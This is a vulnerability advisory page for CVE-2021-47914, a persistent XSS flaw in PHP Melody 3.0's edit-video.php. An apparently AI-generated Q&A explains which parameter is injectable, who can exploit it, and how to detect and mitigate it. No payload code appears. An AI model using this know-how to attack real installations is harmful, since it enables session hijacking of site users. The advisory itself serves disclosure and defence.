CVE-2021-47914
Persistent XSS in PHP Melody 3.0 edit-video.php Allows Hijacking
Publication date: 2026-02-01
Last updated on: 2026-02-11
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| phpsugar | php_melody | 3.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-47914 is a persistent cross-site scripting (XSS) vulnerability in PHP Melody version 3.0. It exists in the 'submitted' parameter of the 'edit-video.php' script, which does not properly neutralize input. This allows remote attackers with certain privileges (such as editors or moderators) to inject malicious JavaScript code that is stored persistently. When the affected video page is viewed (via 'watch.php'), the malicious script executes, enabling attacks like session hijacking, persistent phishing, and manipulation of application modules. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to several security impacts including session hijacking, where attackers can steal user sessions; persistent phishing by injecting malicious content that deceives users; external redirects to malicious sites; and manipulation of application modules, potentially compromising the integrity and functionality of the application. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided resources do not specify how this vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring POST requests to the 'edit-video.php' script, specifically looking for suspicious or malicious input in the 'submitted' parameter. Detection can involve inspecting HTTP traffic for payloads attempting to inject JavaScript code. While no specific commands are provided, using tools like curl or Burp Suite to send crafted POST requests to 'edit-video.php' and observing if the injected script executes when accessing 'watch.php' can help confirm the vulnerability. Additionally, web application firewalls (WAFs) can be configured to detect and block such malicious inputs. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) Encoding, escaping, or filtering the 'submitted' parameter in POST requests to prevent script injection; 2) Restricting transmitted parameters by disallowing special characters; 3) Sanitizing output in 'watch.php' to block execution of injected scripts; 4) Implementing security headers and deploying web application firewalls to prevent exploitation. Applying the vendor's patch released on September 22, 2021, is also critical to fully remediate the vulnerability. [2]